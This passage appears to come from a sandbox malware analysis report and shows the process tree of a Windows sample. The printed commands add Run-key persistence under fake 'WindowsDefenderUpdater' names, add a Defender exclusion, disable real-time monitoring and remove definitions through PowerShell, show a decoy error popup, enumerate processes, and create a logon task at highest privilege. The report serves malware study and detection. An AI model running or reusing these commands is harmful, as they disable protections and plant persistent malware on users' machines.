        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        102⤵
        
        PID:4612
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        102⤵
        Adds Run key to start application
        
        PID:696
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        102⤵
        Adds Run key to start application
        
        PID:5996
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        102⤵
        
        PID:6048
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        103⤵
        
        PID:3048
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        102⤵
        
        PID:6056
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        102⤵
        Checks computer location settings
        
        PID:3696
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5191.tmp\5192.tmp\5193.bat C:\Windows\system32\java.exe"
        103⤵
        
        PID:3080
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        104⤵
        Delays execution with timeout.exe
        
        PID:1016
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        104⤵
        Adds Run key to start application
        
        PID:3260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        104⤵
        
        PID:5632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        104⤵
        
        PID:6136
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        104⤵
        Adds Run key to start application
        
        PID:2516
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        104⤵
        
        PID:2828
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        105⤵
        
        PID:2684
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        104⤵
        
        PID:3440
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        104⤵
        Checks computer location settings
        
        PID:5636
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5700.tmp\5701.tmp\5702.bat C:\Windows\system32\java.exe"
        105⤵
        Drops file in System32 directory
        
        PID:4828
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        106⤵
        
        PID:5716
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        106⤵
        
        PID:5328
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        106⤵
        Adds Run key to start application
        
        PID:3096
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        106⤵
        
        PID:6108
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        106⤵
        
        PID:2072
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        106⤵
        
        PID:3584
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        107⤵
        
        PID:5432
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        106⤵
        
        PID:3460
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        106⤵
        Checks computer location settings
        
        PID:1484
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5F6C.tmp\5F6D.tmp\5F6E.bat C:\Windows\system32\java.exe"
        107⤵
        Drops file in System32 directory
        
        PID:2020
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        108⤵
        Delays execution with timeout.exe
        
        PID:5880
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        108⤵
        Adds Run key to start application
        
        PID:1556
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        108⤵
        Adds Run key to start application
        
        PID:1120
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        108⤵
        
        PID:1696
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        108⤵
        
        PID:856
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        108⤵
        
        PID:3132
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        109⤵
        
        PID:1948
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        108⤵
        
        PID:1136
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        108⤵
        Checks computer location settings
        
        PID:392
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\66BF.tmp\66C0.tmp\66C1.bat C:\Windows\system32\java.exe"
        109⤵
        Drops file in System32 directory
        
        PID:5924
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        110⤵
        
        PID:3868
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        110⤵
        
        PID:2604
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        110⤵
        
        PID:1448
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        110⤵
        
        PID:5808
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        110⤵
        
        PID:4252
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        110⤵
        Adds Run key to start application
        
        PID:5320
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        110⤵
        
        PID:1560
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        111⤵
        
        PID:5476
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        110⤵
        
        PID:5540
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        110⤵
        Checks computer location settings
        
        PID:5144
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E70.tmp\6E71.tmp\6E72.bat C:\Windows\system32\java.exe"
        111⤵
        
        PID:5024
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        112⤵
        
        PID:468
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        112⤵
        
        PID:376
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        112⤵
        
        PID:1428
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        112⤵
        
        PID:6060
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        112⤵
        Adds Run key to start application
        
        PID:5604
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        112⤵
        
        PID:5380
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        113⤵
        
        PID:1384
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        112⤵
        
        PID:4288
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        112⤵
        Checks computer location settings
        
        PID:1552
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\76BD.tmp\76BE.tmp\76BF.bat C:\Windows\system32\java.exe"
        113⤵
        
        PID:1156
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        114⤵
        
        PID:5872
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        114⤵
        
        PID:528
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        114⤵
        
        PID:3564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        114⤵
        
        PID:2152
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        114⤵
        
        PID:1740
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        114⤵
        
        PID:5504
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        114⤵
        
        PID:5188
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        115⤵
        
        PID:5968
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        114⤵
        
        PID:5236
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        114⤵
        Checks computer location settings
        
        PID:5768
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DE1.tmp\7DE2.tmp\7DE3.bat C:\Windows\system32\java.exe"
        115⤵
        
        PID:2480
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        116⤵
        
        PID:5272
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        116⤵
        
        PID:4368
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        116⤵
        
        PID:3992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        116⤵
        
        PID:2072
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        116⤵
        
        PID:3528
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        116⤵
        Adds Run key to start application
        
        PID:4544
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        116⤵
        
        PID:5764
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        117⤵
        
        PID:2492
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        116⤵
        
        PID:1656
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        116⤵
        Checks computer location settings
        
        PID:5876
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\863D.tmp\863E.tmp\863F.bat C:\Windows\system32\java.exe"
        117⤵
        Drops file in System32 directory
        
        PID:2128
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        118⤵
        
        PID:5540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        118⤵
        
        PID:368
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        118⤵
        
        PID:5944
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        118⤵
        
        PID:3584
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        118⤵
        Adds Run key to start application
        
        PID:3328
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        118⤵
        
        PID:4848
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        119⤵
        
        PID:5856
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        118⤵
        
        PID:5476
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        118⤵
        Checks computer location settings
        
        PID:908
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8DEE.tmp\8DEF.tmp\8DF0.bat C:\Windows\system32\java.exe"
        119⤵
        Drops file in System32 directory
        
        PID:4636
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        120⤵
        
        PID:3860
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        120⤵
        
        PID:3880
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        120⤵
        
        PID:4888
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        120⤵
        Adds Run key to start application
        
        PID:5136
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        120⤵
        
        PID:4988
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        120⤵
        
        PID:5740
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        121⤵
        
        PID:2712
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        120⤵
        
        PID:60
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        120⤵
        Checks computer location settings
        
        PID:1484
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\95BE.tmp\95BF.tmp\95C0.bat C:\Windows\system32\java.exe"
        121⤵
        Drops file in System32 directory
        
        PID:2972
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        122⤵
        
        PID:2628
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        122⤵
        Adds Run key to start application
        
        PID:2852
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        122⤵
        
        PID:4056
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        122⤵
        
        PID:5212
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        122⤵
        Adds Run key to start application
        
        PID:5716
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        122⤵
        
        PID:4724
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        123⤵
        
        PID:5180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'"
        124⤵
        
        PID:5508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe'
        125⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        124⤵
        
        PID:2528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        125⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()""
        124⤵
        
        PID:2788
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Could not open the file', 0, 'Error', 32+16);close()"
        125⤵
        
        PID:5080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        124⤵
        
        PID:5332
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        125⤵
        Enumerates processes with tasklist
        
        PID:3452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        124⤵
        
        PID:3460
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        125⤵
        
        PID:5764
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        122⤵
        
        PID:4544
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        122⤵
        Checks computer location settings
        
        PID:4796
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9D7E.tmp\9D7F.tmp\9D80.bat C:\Windows\system32\java.exe"
        123⤵
        Drops file in System32 directory
        
        PID:3260
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        124⤵
        Delays execution with timeout.exe
        
        PID:5552
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        122⤵
        
        PID:3684
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        120⤵
        Delays execution with timeout.exe
        
        PID:4068
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        118⤵
        
        PID:376
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        116⤵
        Delays execution with timeout.exe
        
        PID:1744
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        114⤵
        Delays execution with timeout.exe
        
        PID:2256
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        112⤵
        
        PID:2788
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        110⤵
        
        PID:5512
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        108⤵
        Delays execution with timeout.exe
        
        PID:5564
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        106⤵
        Delays execution with timeout.exe
        
        PID:4848
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        104⤵
        Delays execution with timeout.exe
        
        PID:6000
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        102⤵
        
        PID:3404
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        100⤵
        Delays execution with timeout.exe
        
        PID:400
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        98⤵
        
        PID:4056
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        96⤵
        Delays execution with timeout.exe
        
        PID:5504
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        94⤵
        
        PID:820
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        92⤵
        Delays execution with timeout.exe
        
        PID:6032
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        90⤵
        Delays execution with timeout.exe
        
        PID:3000
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        88⤵
        
        PID:5724
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        86⤵
        
        PID:5216
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        84⤵
        
        PID:5816
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        82⤵
        
        PID:5908
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        80⤵
        
        PID:5468
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        78⤵
        
        PID:5604
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        76⤵
        Delays execution with timeout.exe
        
        PID:5660
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        74⤵
        
        PID:1776
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        72⤵
        Delays execution with timeout.exe
        
        PID:3096
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        70⤵
        Delays execution with timeout.exe
        
        PID:5232
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        68⤵
        
        PID:5636
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        66⤵
        
        PID:3984
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        64⤵
        Delays execution with timeout.exe
        
        PID:3348
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        62⤵
        Delays execution with timeout.exe
        
        PID:908
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        60⤵
        Delays execution with timeout.exe
        
        PID:5952
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        58⤵
        
        PID:5904
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        56⤵
        
        PID:2436
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        54⤵
        Delays execution with timeout.exe
        
        PID:1300
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        52⤵
        
        PID:2980
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        50⤵
        Delays execution with timeout.exe
        
        PID:2272
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        48⤵
        Delays execution with timeout.exe
        
        PID:1016
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        46⤵
        Delays execution with timeout.exe
        
        PID:3056
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        44⤵
        Delays execution with timeout.exe
        
        PID:5504
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        42⤵
        
        PID:6060
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        40⤵
        
        PID:3128
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        38⤵
        Delays execution with timeout.exe
        
        PID:6092
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        36⤵
        
        PID:4612
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        34⤵
        
        PID:6036
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        32⤵
        
        PID:640
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        30⤵
        
        PID:4056
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        28⤵
        Delays execution with timeout.exe
        
        PID:1016
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        26⤵
        
        PID:1980
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        24⤵
        
        PID:368
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        22⤵
        Delays execution with timeout.exe
        
        PID:5516
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        20⤵
        
        PID:6036
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        18⤵
        Delays execution with timeout.exe
        
        PID:380
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        16⤵
        
        PID:2792
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        14⤵
        Delays execution with timeout.exe
        
        PID:5644
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        12⤵
        
        PID:5288
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        10⤵
        Delays execution with timeout.exe
        
        PID:5460
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        8⤵
        Delays execution with timeout.exe
        
        PID:4832
      - C:\Windows\system32\timeout.exe
        
        timeout 5
        6⤵
        
        PID:1744
  - - C:\Windows\system32\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:392
- C:\Users\Admin\AppData\Local\Temp\Files\x.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\x.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "x" /sc ONLOGON /tr "C:\Windows\system32\SubDir\x.exe" /rl HIGHEST /f
    3⤵
